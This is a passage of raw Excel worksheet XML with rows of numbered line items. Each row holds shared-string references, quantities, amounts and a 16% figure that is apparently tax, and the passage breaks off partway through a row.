    <row r="739" spans="2:11">
      <c r="B739" s="9">
        <v>766</v>
      </c>
      <c r="C739" s="238" t="s">
        <v>6615</v>
      </c>
      <c r="D739" s="238" t="s">
        <v>6616</v>
      </c>
      <c r="E739" s="238" t="s">
        <v>6617</v>
      </c>
      <c r="F739" s="238" t="s">
        <v>6618</v>
      </c>
      <c r="G739" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H739" s="10">
        <v>11</v>
      </c>
      <c r="I739" s="14">
        <v>18040</v>
      </c>
      <c r="J739" s="15">
        <v>2886.4</v>
      </c>
      <c r="K739" s="16"/>
    </row>
    <row r="740" spans="2:11">
      <c r="B740" s="9">
        <v>767</v>
      </c>
      <c r="C740" s="238" t="s">
        <v>6619</v>
      </c>
      <c r="D740" s="238" t="s">
        <v>6616</v>
      </c>
      <c r="E740" s="238" t="s">
        <v>6617</v>
      </c>
      <c r="F740" s="238" t="s">
        <v>6541</v>
      </c>
      <c r="G740" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H740" s="10">
        <v>1</v>
      </c>
      <c r="I740" s="14">
        <v>5387.18</v>
      </c>
      <c r="J740" s="15">
        <v>861.9488</v>
      </c>
      <c r="K740" s="16"/>
    </row>
    <row r="741" spans="2:11">
      <c r="B741" s="9">
        <v>768</v>
      </c>
      <c r="C741" s="238" t="s">
        <v>6620</v>
      </c>
      <c r="D741" s="238" t="s">
        <v>6621</v>
      </c>
      <c r="E741" s="238" t="s">
        <v>6617</v>
      </c>
      <c r="F741" s="238" t="s">
        <v>2187</v>
      </c>
      <c r="G741" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H741" s="10">
        <v>18</v>
      </c>
      <c r="I741" s="14">
        <v>1901.56</v>
      </c>
      <c r="J741" s="15">
        <v>304.2432</v>
      </c>
      <c r="K741" s="16"/>
    </row>
    <row r="742" spans="2:11">
      <c r="B742" s="9">
        <v>769</v>
      </c>
      <c r="C742" s="238" t="s">
        <v>6622</v>
      </c>
      <c r="D742" s="238" t="s">
        <v>6616</v>
      </c>
      <c r="E742" s="238" t="s">
        <v>6617</v>
      </c>
      <c r="F742" s="238" t="s">
        <v>6623</v>
      </c>
      <c r="G742" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H742" s="10">
        <v>1</v>
      </c>
      <c r="I742" s="14">
        <v>2735.04</v>
      </c>
      <c r="J742" s="15">
        <v>437.6064</v>
      </c>
      <c r="K742" s="16"/>
    </row>
    <row r="743" spans="2:11">
      <c r="B743" s="9">
        <v>770</v>
      </c>
      <c r="C743" s="238" t="s">
        <v>6624</v>
      </c>
      <c r="D743" s="238" t="s">
        <v>6616</v>
      </c>
      <c r="E743" s="238" t="s">
        <v>6617</v>
      </c>
      <c r="F743" s="238" t="s">
        <v>6625</v>
      </c>
      <c r="G743" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H743" s="10">
        <v>2</v>
      </c>
      <c r="I743" s="14">
        <v>3303.72</v>
      </c>
      <c r="J743" s="15">
        <v>528.5952</v>
      </c>
      <c r="K743" s="16"/>
    </row>
    <row r="744" spans="2:11">
      <c r="B744" s="9">
        <v>771</v>
      </c>
      <c r="C744" s="238" t="s">
        <v>6626</v>
      </c>
      <c r="D744" s="238" t="s">
        <v>6616</v>
      </c>
      <c r="E744" s="238" t="s">
        <v>6617</v>
      </c>
      <c r="F744" s="238" t="s">
        <v>6627</v>
      </c>
      <c r="G744" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H744" s="10">
        <v>2</v>
      </c>
      <c r="I744" s="14">
        <v>1744.15</v>
      </c>
      <c r="J744" s="15">
        <v>279.0656</v>
      </c>
      <c r="K744" s="16"/>
    </row>
    <row r="745" spans="2:11">
      <c r="B745" s="9">
        <v>772</v>
      </c>
      <c r="C745" s="238" t="s">
        <v>6628</v>
      </c>
      <c r="D745" s="238" t="s">
        <v>6629</v>
      </c>
      <c r="E745" s="238" t="s">
        <v>6630</v>
      </c>
      <c r="F745" s="238" t="s">
        <v>6631</v>
      </c>
      <c r="G745" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H745" s="10">
        <v>2</v>
      </c>
      <c r="I745" s="14">
        <v>124.79</v>
      </c>
      <c r="J745" s="15">
        <v>19.968</v>
      </c>
      <c r="K745" s="16"/>
    </row>
    <row r="746" spans="2:11">
      <c r="B746" s="9">
        <v>773</v>
      </c>
      <c r="C746" s="238" t="s">
        <v>6632</v>
      </c>
      <c r="D746" s="238" t="s">
        <v>6360</v>
      </c>
      <c r="E746" s="238" t="s">
        <v>6612</v>
      </c>
      <c r="F746" s="238" t="s">
        <v>6541</v>
      </c>
      <c r="G746" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H746" s="10">
        <v>1</v>
      </c>
      <c r="I746" s="14">
        <v>126.39</v>
      </c>
      <c r="J746" s="15">
        <v>20.2224</v>
      </c>
      <c r="K746" s="16"/>
    </row>
    <row r="747" spans="2:11">
      <c r="B747" s="9">
        <v>774</v>
      </c>
      <c r="C747" s="238" t="s">
        <v>6633</v>
      </c>
      <c r="D747" s="238" t="s">
        <v>6634</v>
      </c>
      <c r="E747" s="238" t="s">
        <v>6635</v>
      </c>
      <c r="F747" s="238" t="s">
        <v>764</v>
      </c>
      <c r="G747" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H747" s="10">
        <v>1</v>
      </c>
      <c r="I747" s="14">
        <v>1049.29</v>
      </c>
      <c r="J747" s="15">
        <v>167.8864</v>
      </c>
      <c r="K747" s="16"/>
    </row>
    <row r="748" spans="2:11">
      <c r="B748" s="9">
        <v>775</v>
      </c>
      <c r="C748" s="238" t="s">
        <v>6636</v>
      </c>
      <c r="D748" s="238" t="s">
        <v>6634</v>
      </c>
      <c r="E748" s="238" t="s">
        <v>6635</v>
      </c>
      <c r="F748" s="238" t="s">
        <v>6618</v>
      </c>
      <c r="G748" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H748" s="10">
        <v>14</v>
      </c>
      <c r="I748" s="14">
        <v>13597.71</v>
      </c>
      <c r="J748" s="15">
        <v>2175.6448</v>
      </c>
      <c r="K748" s="16"/>
    </row>
    <row r="749" spans="2:11">
      <c r="B749" s="9">
        <v>776</v>
      </c>
      <c r="C749" s="238" t="s">
        <v>6637</v>
      </c>
      <c r="D749" s="238" t="s">
        <v>6588</v>
      </c>
      <c r="E749" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F749" s="238" t="s">
        <v>6638</v>
      </c>
      <c r="G749" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H749" s="10">
        <v>1</v>
      </c>
      <c r="I749" s="14">
        <v>36.76</v>
      </c>
      <c r="J749" s="15">
        <v>5.8816</v>
      </c>
      <c r="K749" s="16"/>
    </row>
    <row r="750" spans="2:11">
      <c r="B750" s="9">
        <v>777</v>
      </c>
      <c r="C750" s="238" t="s">
        <v>6639</v>
      </c>
      <c r="D750" s="238" t="s">
        <v>6360</v>
      </c>
      <c r="E750" s="238" t="s">
        <v>6640</v>
      </c>
      <c r="F750" s="238" t="s">
        <v>6548</v>
      </c>
      <c r="G750" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H750" s="10">
        <v>2</v>
      </c>
      <c r="I750" s="14">
        <v>479.85</v>
      </c>
      <c r="J750" s="15">
        <v>76.7776</v>
      </c>
      <c r="K750" s="16"/>
    </row>
    <row r="751" spans="2:11">
      <c r="B751" s="9">
        <v>778</v>
      </c>
      <c r="C751" s="238" t="s">
        <v>6641</v>
      </c>
      <c r="D751" s="238" t="s">
        <v>6360</v>
      </c>
      <c r="E751" s="238" t="s">
        <v>6612</v>
      </c>
      <c r="F751" s="238" t="s">
        <v>6642</v>
      </c>
      <c r="G751" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H751" s="10">
        <v>2</v>
      </c>
      <c r="I751" s="14">
        <v>478.63</v>
      </c>
      <c r="J751" s="15">
        <v>76.5824</v>
      </c>
      <c r="K751" s="16"/>
    </row>
    <row r="752" spans="2:11">
      <c r="B752" s="9">
        <v>779</v>
      </c>
      <c r="C752" s="238" t="s">
        <v>6643</v>
      </c>
      <c r="D752" s="238" t="s">
        <v>6360</v>
      </c>
      <c r="E752" s="238" t="s">
        <v>6612</v>
      </c>
      <c r="F752" s="238" t="s">
        <v>6644</v>
      </c>
      <c r="G752" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H752" s="10">
        <v>2</v>
      </c>
      <c r="I752" s="14">
        <v>179.48</v>
      </c>
      <c r="J752" s="15">
        <v>28.7168</v>
      </c>
      <c r="K752" s="16"/>
    </row>
    <row r="753" spans="2:11">
      <c r="B753" s="9">
        <v>780</v>
      </c>
      <c r="C753" s="238" t="s">
        <v>6645</v>
      </c>
      <c r="D753" s="238" t="s">
        <v>6634</v>
      </c>
      <c r="E753" s="238" t="s">
        <v>6635</v>
      </c>
      <c r="F753" s="238" t="s">
        <v>6541</v>
      </c>
      <c r="G753" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H753" s="10">
        <v>3</v>
      </c>
      <c r="I753" s="14">
        <v>4477.75</v>
      </c>
      <c r="J753" s="15">
        <v>716.4384</v>
      </c>
      <c r="K753" s="16"/>
    </row>
    <row r="754" spans="2:11">
      <c r="B754" s="9">
        <v>781</v>
      </c>
      <c r="C754" s="238" t="s">
        <v>6646</v>
      </c>
      <c r="D754" s="238" t="s">
        <v>6634</v>
      </c>
      <c r="E754" s="238" t="s">
        <v>6635</v>
      </c>
      <c r="F754" s="238" t="s">
        <v>6503</v>
      </c>
      <c r="G754" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H754" s="10">
        <v>48</v>
      </c>
      <c r="I754" s="14">
        <v>925.67</v>
      </c>
      <c r="J754" s="15">
        <v>148.0704</v>
      </c>
      <c r="K754" s="16"/>
    </row>
    <row r="755" spans="2:11">
      <c r="B755" s="9">
        <v>782</v>
      </c>
      <c r="C755" s="238" t="s">
        <v>6647</v>
      </c>
      <c r="D755" s="238" t="s">
        <v>6634</v>
      </c>
      <c r="E755" s="238" t="s">
        <v>6635</v>
      </c>
      <c r="F755" s="238" t="s">
        <v>6320</v>
      </c>
      <c r="G755" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H755" s="10">
        <v>1</v>
      </c>
      <c r="I755" s="14">
        <v>2051.28</v>
      </c>
      <c r="J755" s="15">
        <v>328.2048</v>
      </c>
      <c r="K755" s="16"/>
    </row>
    <row r="756" spans="2:11">
      <c r="B756" s="9">
        <v>783</v>
      </c>
      <c r="C756" s="238" t="s">
        <v>6648</v>
      </c>
      <c r="D756" s="238" t="s">
        <v>6634</v>
      </c>
      <c r="E756" s="238" t="s">
        <v>6635</v>
      </c>
      <c r="F756" s="238" t="s">
        <v>6355</v>
      </c>
      <c r="G756" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H756" s="10">
        <v>3</v>
      </c>
      <c r="I756" s="14">
        <v>899.57</v>
      </c>
      <c r="J756" s="15">
        <v>143.9328</v>
      </c>
      <c r="K756" s="16"/>
    </row>
    <row r="757" spans="2:11">
      <c r="B757" s="9">
        <v>784</v>
      </c>
      <c r="C757" s="238" t="s">
        <v>6649</v>
      </c>
      <c r="D757" s="238" t="s">
        <v>6616</v>
      </c>
      <c r="E757" s="238" t="s">
        <v>6617</v>
      </c>
      <c r="F757" s="238" t="s">
        <v>6650</v>
      </c>
      <c r="G757" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H757" s="10">
        <v>10</v>
      </c>
      <c r="I757" s="14">
        <v>1320.39</v>
      </c>
      <c r="J757" s="15">
        <v>211.264</v>
      </c>
      <c r="K757" s="16"/>
    </row>
    <row r="758" spans="2:11">
      <c r="B758" s="9">
        <v>785</v>
      </c>
      <c r="C758" s="238" t="s">
        <v>6651</v>
      </c>
      <c r="D758" s="238" t="s">
        <v>6616</v>
      </c>
      <c r="E758" s="238" t="s">
        <v>6617</v>
      </c>
      <c r="F758" s="238" t="s">
        <v>6652</v>
      </c>
      <c r="G758" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H758" s="10">
        <v>18</v>
      </c>
      <c r="I758" s="14">
        <v>846.15</v>
      </c>
      <c r="J758" s="15">
        <v>135.3888</v>
      </c>
      <c r="K758" s="16"/>
    </row>
    <row r="759" spans="2:11">
      <c r="B759" s="9">
        <v>786</v>
      </c>
      <c r="C759" s="238" t="s">
        <v>6653</v>
      </c>
      <c r="D759" s="238" t="s">
        <v>6616</v>
      </c>
      <c r="E759" s="238" t="s">
        <v>6617</v>
      </c>
      <c r="F759" s="238" t="s">
        <v>764</v>
      </c>
      <c r="G759" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H759" s="10">
        <v>2</v>
      </c>
      <c r="I759" s="14">
        <v>5025.64</v>
      </c>
      <c r="J759" s="15">
        <v>804.1024</v>
      </c>
      <c r="K759" s="16"/>
    </row>
    <row r="760" spans="2:11">
      <c r="B760" s="9">
        <v>787</v>
      </c>
      <c r="C760" s="238" t="s">
        <v>6654</v>
      </c>
      <c r="D760" s="238" t="s">
        <v>6655</v>
      </c>
      <c r="E760" s="238" t="s">
        <v>6656</v>
      </c>
      <c r="F760" s="9"/>
      <c r="G760" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H760" s="10">
        <v>11</v>
      </c>
      <c r="I760" s="14">
        <v>23858.35</v>
      </c>
      <c r="J760" s="15">
        <v>3817.3344</v>
      </c>
      <c r="K760" s="16"/>
    </row>
    <row r="761" spans="2:11">
      <c r="B761" s="9">
        <v>788</v>
      </c>
      <c r="C761" s="238" t="s">
        <v>6657</v>
      </c>
      <c r="D761" s="238" t="s">
        <v>6377</v>
      </c>
      <c r="E761" s="238" t="s">
        <v>6658</v>
      </c>
      <c r="F761" s="238" t="s">
        <v>6659</v>
      </c>
      <c r="G761" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H761" s="10">
        <v>6</v>
      </c>
      <c r="I761" s="14">
        <v>1229.66</v>
      </c>
      <c r="J761" s="15">
        <v>196.7424</v>
      </c>
      <c r="K761" s="16"/>
    </row>
    <row r="762" spans="2:11">
      <c r="B762" s="9">
        <v>789</v>
      </c>
      <c r="C762" s="238" t="s">
        <v>6660</v>
      </c>
      <c r="D762" s="238" t="s">
        <v>6661</v>
      </c>
      <c r="E762" s="238" t="s">
        <v>6662</v>
      </c>
      <c r="F762" s="238" t="s">
        <v>6663</v>
      </c>
      <c r="G762" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H762" s="10">
        <v>1</v>
      </c>
      <c r="I762" s="14">
        <v>271.36</v>
      </c>
      <c r="J762" s="15">
        <v>43.4176</v>
      </c>
      <c r="K762" s="16"/>
    </row>
    <row r="763" spans="2:11">
      <c r="B763" s="9">
        <v>790</v>
      </c>
      <c r="C763" s="238" t="s">
        <v>6664</v>
      </c>
      <c r="D763" s="238" t="s">
        <v>6395</v>
      </c>
      <c r="E763" s="238" t="s">
        <v>6662</v>
      </c>
      <c r="F763" s="238" t="s">
        <v>6665</v>
      </c>
      <c r="G763" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H763" s="10">
        <v>2</v>
      </c>
      <c r="I763" s="14">
        <v>316.24</v>
      </c>
      <c r="J763" s="15">
        <v>50.5984</v>
      </c>
      <c r="K763" s="16"/>
    </row>
    <row r="764" spans="2:11">
      <c r="B764" s="9">
        <v>791</v>
      </c>
      <c r="C764" s="238" t="s">
        <v>6666</v>
      </c>
      <c r="D764" s="238" t="s">
        <v>6661</v>
      </c>
      <c r="E764" s="238" t="s">
        <v>6662</v>
      </c>
      <c r="F764" s="238" t="s">
        <v>6667</v>
      </c>
      <c r="G764" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H764" s="10">
        <v>1</v>
      </c>
      <c r="I764" s="14">
        <v>311.97</v>
      </c>
      <c r="J764" s="15">
        <v>49.9152</v>
      </c>
      <c r="K764" s="16"/>
    </row>
    <row r="765" spans="2:11">
      <c r="B765" s="9">
        <v>792</v>
      </c>
      <c r="C765" s="238" t="s">
        <v>6668</v>
      </c>
      <c r="D765" s="238" t="s">
        <v>6661</v>
      </c>
      <c r="E765" s="238" t="s">
        <v>6662</v>
      </c>
      <c r="F765" s="238" t="s">
        <v>6669</v>
      </c>
      <c r="G765" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H765" s="10">
        <v>1</v>
      </c>
      <c r="I765" s="14">
        <v>4156.41</v>
      </c>
      <c r="J765" s="15">
        <v>665.0256</v>
      </c>
      <c r="K765" s="16"/>
    </row>
    <row r="766" spans="2:11">
      <c r="B766" s="9">
        <v>793</v>
      </c>
      <c r="C766" s="238" t="s">
        <v>6670</v>
      </c>
      <c r="D766" s="238" t="s">
        <v>6671</v>
      </c>
      <c r="E766" s="238" t="s">
        <v>6672</v>
      </c>
      <c r="F766" s="238" t="s">
        <v>4423</v>
      </c>
      <c r="G766" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H766" s="10">
        <v>1</v>
      </c>
      <c r="I766" s="14">
        <v>353.27</v>
      </c>
      <c r="J766" s="15">
        <v>56.5232</v>
      </c>
      <c r="K766" s="16"/>
    </row>
    <row r="767" spans="2:11">
      <c r="B767" s="9">
        <v>794</v>
      </c>
      <c r="C767" s="238" t="s">
        <v>6673</v>
      </c>
      <c r="D767" s="238" t="s">
        <v>6674</v>
      </c>
      <c r="E767" s="238" t="s">
        <v>6675</v>
      </c>
      <c r="F767" s="238" t="s">
        <v>6676</v>
      </c>
      <c r="G767" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H767" s="10">
        <v>20</v>
      </c>
      <c r="I767" s="14">
        <v>6495.73</v>
      </c>
      <c r="J767" s="15">
        <v>1039.328</v>
      </c>
      <c r="K767" s="16"/>
    </row>
    <row r="768" spans="2:11">
      <c r="B768" s="9">
        <v>795</v>
      </c>
      <c r="C768" s="238" t="s">
        <v>6677</v>
      </c>
      <c r="D768" s="238" t="s">
        <v>6678</v>
      </c>
      <c r="E768" s="238" t="s">
        <v>6675</v>
      </c>
      <c r="F768" s="238" t="s">
        <v>6679</v>
      </c>
      <c r="G768" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H768" s="10">
        <v>10</v>
      </c>
      <c r="I768" s="14">
        <v>4655.14</v>
      </c>
      <c r="J768" s="15">
        <v>744.816</v>
      </c>
      <c r="K768" s="16"/>
    </row>
    <row r="769" spans="2:11">
      <c r="B769" s="9">
        <v>796</v>
      </c>
      <c r="C769" s="238" t="s">
        <v>6680</v>
      </c>
      <c r="D769" s="238" t="s">
        <v>6674</v>
      </c>
      <c r="E769" s="238" t="s">
        <v>6681</v>
      </c>
      <c r="F769" s="238" t="s">
        <v>6676</v>
      </c>
      <c r="G769" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H769" s="10">
        <v>14</v>
      </c>
      <c r="I769" s="14">
        <v>4475.21</v>
      </c>
      <c r="J769" s="15">
        <v>716.0384</v>
      </c>
      <c r="K769" s="16"/>
    </row>
    <row r="770" spans="2:11">
      <c r="B770" s="9">
        <v>797</v>
      </c>
      <c r="C770" s="238" t="s">
        <v>6682</v>
      </c>
      <c r="D770" s="238" t="s">
        <v>6683</v>
      </c>
      <c r="E770" s="238" t="s">
        <v>6681</v>
      </c>
      <c r="F770" s="238" t="s">
        <v>6684</v>
      </c>
      <c r="G770" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H770" s="10">
        <v>17</v>
      </c>
      <c r="I770" s="14">
        <v>2560.5</v>
      </c>
      <c r="J770" s="15">
        <v>409.6864</v>
      </c>
      <c r="K770" s="16"/>
    </row>
    <row r="771" spans="2:11">
      <c r="B771" s="9">
        <v>798</v>
      </c>
      <c r="C771" s="238" t="s">
        <v>6685</v>
      </c>
      <c r="D771" s="238" t="s">
        <v>6686</v>
      </c>
      <c r="E771" s="238" t="s">
        <v>6681</v>
      </c>
      <c r="F771" s="238" t="s">
        <v>6687</v>
      </c>
      <c r="G771" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H771" s="10">
        <v>3</v>
      </c>
      <c r="I771" s="14">
        <v>713.67</v>
      </c>
      <c r="J771" s="15">
        <v>114.1872</v>
      </c>
      <c r="K771" s="16"/>
    </row>
    <row r="772" spans="2:11">
      <c r="B772" s="9">
        <v>799</v>
      </c>
      <c r="C772" s="238" t="s">
        <v>6688</v>
      </c>
      <c r="D772" s="238" t="s">
        <v>6689</v>
      </c>
      <c r="E772" s="238" t="s">
        <v>3854</v>
      </c>
      <c r="F772" s="238" t="s">
        <v>6690</v>
      </c>
      <c r="G772" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H772" s="10">
        <v>14</v>
      </c>
      <c r="I772" s="14">
        <v>1089.58</v>
      </c>
      <c r="J772" s="15">
        <v>174.3392</v>
      </c>
      <c r="K772" s="16"/>
    </row>
    <row r="773" spans="2:11">
      <c r="B773" s="9">
        <v>800</v>
      </c>
      <c r="C773" s="238" t="s">
        <v>6691</v>
      </c>
      <c r="D773" s="238" t="s">
        <v>4701</v>
      </c>
      <c r="E773" s="238" t="s">
        <v>6692</v>
      </c>
      <c r="F773" s="238" t="s">
        <v>708</v>
      </c>
      <c r="G773" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H773" s="10">
        <v>4</v>
      </c>
      <c r="I773" s="14">
        <v>11979.78</v>
      </c>
      <c r="J773" s="15">
        <v>1916.768</v>
      </c>
      <c r="K773" s="16"/>
    </row>
    <row r="774" spans="2:11">
      <c r="B774" s="9">
        <v>801</v>
      </c>
      <c r="C774" s="238" t="s">
        <v>6693</v>
      </c>
      <c r="D774" s="238" t="s">
        <v>4701</v>
      </c>
      <c r="E774" s="238" t="s">
        <v>6692</v>
      </c>
      <c r="F774" s="238" t="s">
        <v>4423</v>
      </c>
      <c r="G774" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H774" s="10">
        <v>4</v>
      </c>
      <c r="I774" s="14">
        <v>2666.65</v>
      </c>
      <c r="J774" s="15">
        <v>426.6624</v>
      </c>
      <c r="K774" s="16"/>
    </row>
    <row r="775" spans="2:11">
      <c r="B775" s="9">
        <v>802</v>
      </c>
      <c r="C775" s="238" t="s">
        <v>6694</v>
      </c>
      <c r="D775" s="238" t="s">
        <v>6671</v>
      </c>
      <c r="E775" s="238" t="s">
        <v>6695</v>
      </c>
      <c r="F775" s="238" t="s">
        <v>476</v>
      </c>
      <c r="G775" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H775" s="10">
        <v>8</v>
      </c>
      <c r="I775" s="14">
        <v>1141.12</v>
      </c>
      <c r="J775" s="15">
        <v>182.5792</v>
      </c>
      <c r="K775" s="16"/>
    </row>
    <row r="776" spans="2:11">
      <c r="B776" s="9">
        <v>803</v>
      </c>
      <c r="C776" s="238" t="s">
        <v>6696</v>
      </c>
      <c r="D776" s="238" t="s">
        <v>6697</v>
      </c>
      <c r="E776" s="238" t="s">
        <v>6698</v>
      </c>
      <c r="F776" s="238" t="s">
        <v>6684</v>
      </c>
      <c r="G776" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H776" s="10">
        <v>14</v>
      </c>
      <c r="I776" s="14">
        <v>1675.2</v>
      </c>
      <c r="J776" s="15">
        <v>268.0384</v>
      </c>
      <c r="K776" s="16"/>
    </row>
    <row r="777" spans="2:11">
      <c r="B777" s="9">
        <v>804</v>
      </c>
      <c r="C777" s="238" t="s">
        <v>6699</v>
      </c>
      <c r="D777" s="238" t="s">
        <v>6700</v>
      </c>
      <c r="E777" s="238" t="s">
        <v>6701</v>
      </c>
      <c r="F777" s="238" t="s">
        <v>6676</v>
      </c>
      <c r="G777" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H777" s="10">
        <v>4</v>
      </c>
      <c r="I777" s="14">
        <v>430.78</v>
      </c>
      <c r="J777" s="15">
        <v>68.928</v>
      </c>
      <c r="K777" s="16"/>
    </row>
    <row r="778" spans="2:11">
      <c r="B778" s="9">
        <v>805</v>
      </c>
      <c r="C778" s="238" t="s">
        <v>6702</v>
      </c>
      <c r="D778" s="238" t="s">
        <v>6703</v>
      </c>
      <c r="E778" s="238" t="s">
        <v>6704</v>
      </c>
      <c r="F778" s="238" t="s">
        <v>6684</v>
      </c>
      <c r="G778" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H778" s="10">
        <v>28</v>
      </c>
      <c r="I778" s="14">
        <v>1121.44</v>
      </c>
      <c r="J778" s="15">
        <v>179.424</v>
      </c>
      <c r="K778" s="16"/>
    </row>
    <row r="779" spans="2:11">
      <c r="B779" s="9">
        <v>806</v>
      </c>
      <c r="C779" s="238" t="s">
        <v>6705</v>
      </c>
      <c r="D779" s="238" t="s">
        <v>6706</v>
      </c>
      <c r="E779" s="238" t="s">
        <v>6704</v>
      </c>
      <c r="F779" s="238" t="s">
        <v>3184</v>
      </c>
      <c r="G779" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H779" s="10">
        <v>13</v>
      </c>
      <c r="I779" s="14">
        <v>1140.73</v>
      </c>
      <c r="J779" s="15">
        <v>182.52</v>
      </c>
      <c r="K779" s="16"/>
    </row>
    <row r="780" spans="2:11">
      <c r="B780" s="9">
        <v>807</v>
      </c>
      <c r="C780" s="238" t="s">
        <v>6707</v>
      </c>
      <c r="D780" s="238" t="s">
        <v>6706</v>
      </c>
      <c r="E780" s="238" t="s">
        <v>6704</v>
      </c>
      <c r="F780" s="238" t="s">
        <v>708</v>
      </c>
      <c r="G780" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H780" s="10">
        <v>13</v>
      </c>
      <c r="I780" s="14">
        <v>919.74</v>
      </c>
      <c r="J780" s="15">
        <v>147.16</v>
      </c>
      <c r="K780" s="16"/>
    </row>
    <row r="781" spans="2:11">
      <c r="B781" s="9">
        <v>808</v>
      </c>
      <c r="C781" s="238" t="s">
        <v>6708</v>
      </c>
      <c r="D781" s="238" t="s">
        <v>6709</v>
      </c>
      <c r="E781" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F781" s="238" t="s">
        <v>6710</v>
      </c>
      <c r="G781" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H781" s="10">
        <v>6</v>
      </c>
      <c r="I781" s="14">
        <v>467.37</v>
      </c>
      <c r="J781" s="15">
        <v>74.784</v>
      </c>
      <c r="K781" s="16"/>
    </row>
    <row r="782" spans="2:11">
      <c r="B782" s="9">
        <v>809</v>
      </c>
      <c r="C782" s="238" t="s">
        <v>6711</v>
      </c>
      <c r="D782" s="238" t="s">
        <v>6712</v>
      </c>
      <c r="E782" s="238" t="s">
        <v>6713</v>
      </c>
      <c r="F782" s="9"/>
      <c r="G782" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H782" s="10">
        <v>23</v>
      </c>
      <c r="I782" s="14">
        <v>707.8</v>
      </c>
      <c r="J782" s="15">
        <v>113.2336</v>
      </c>
      <c r="K782" s="16"/>
    </row>
    <row r="783" spans="2:11">
      <c r="B783" s="9">
        <v>810</v>
      </c>
      <c r="C783" s="238" t="s">
        <v>6714</v>
      </c>
      <c r="D783" s="238" t="s">
        <v>6715</v>
      </c>
      <c r="E783" s="238" t="s">
        <v>6716</v>
      </c>
      <c r="F783" s="238" t="s">
        <v>4423</v>
      </c>
      <c r="G783" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H783" s="10">
        <v>7</v>
      </c>
      <c r="I783" s="14">
        <v>215.38</v>
      </c>
      <c r="J783" s="15">
        <v>34.4624</v>
      </c>
      <c r="K783" s="16"/>
    </row>
    <row r="784" spans="2:11">
      <c r="B784" s="9">
        <v>811</v>
      </c>
      <c r="C784" s="238" t="s">
        <v>6717</v>
      </c>
      <c r="D784" s="238" t="s">
        <v>6718</v>
      </c>
      <c r="E784" s="238" t="s">
        <v>6719</v>
      </c>
      <c r="F784" s="238" t="s">
        <v>6679</v>
      </c>
      <c r="G784" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H784" s="10">
        <v>5</v>
      </c>
      <c r="I784" s="14">
        <v>6190.47</v>
      </c>
      <c r="J784" s="15">
        <v>990.472</v>
      </c>
      <c r="K784" s="16"/>
    </row>
    <row r="785" spans="2:11">
      <c r="B785" s="9">
        <v>812</v>
      </c>
      <c r="C785" s="238" t="s">
        <v>6720</v>
      </c>
      <c r="D785" s="238" t="s">
        <v>6718</v>
      </c>
      <c r="E785" s="238" t="s">
        <v>6719</v>
      </c>
      <c r="F785" s="238" t="s">
        <v>6676</v>
      </c>
      <c r="G785" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H785" s="10">
        <v>6</v>
      </c>
      <c r="I785" s="14">
        <v>6923.07</v>
      </c>
      <c r="J785" s="15">
        <v>1107.696</v>
      </c>
      <c r="K785" s="16"/>
    </row>
    <row r="786" spans="2:11">
      <c r="B786" s="9">
        <v>813</v>
      </c>
      <c r="C786" s="238" t="s">
        <v>6721</v>
      </c>
      <c r="D786" s="238" t="s">
        <v>6722</v>
      </c>
      <c r="E786" s="238" t="s">
        <v>6719</v>
      </c>
      <c r="F786" s="238" t="s">
        <v>6723</v>
      </c>
      <c r="G786" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H786" s="10">
        <v>5</v>
      </c>
      <c r="I786" s="14">
        <v>2777.78</v>
      </c>
      <c r="J786" s="15">
        <v>444.448</v>
      </c>
      <c r="K786" s="16"/>
    </row>
    <row r="787" spans="2:11">
      <c r="B787" s="9">
        <v>814</v>
      </c>
      <c r="C787" s="238" t="s">
        <v>6724</v>
      </c>
      <c r="D787" s="238" t="s">
        <v>6725</v>
      </c>
      <c r="E787" s="238" t="s">
        <v>6726</v>
      </c>
      <c r="F787" s="238" t="s">
        <v>6676</v>
      </c>
      <c r="G787" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H787" s="10">
        <v>8</v>
      </c>
      <c r="I787" s="14">
        <v>5661.52</v>
      </c>
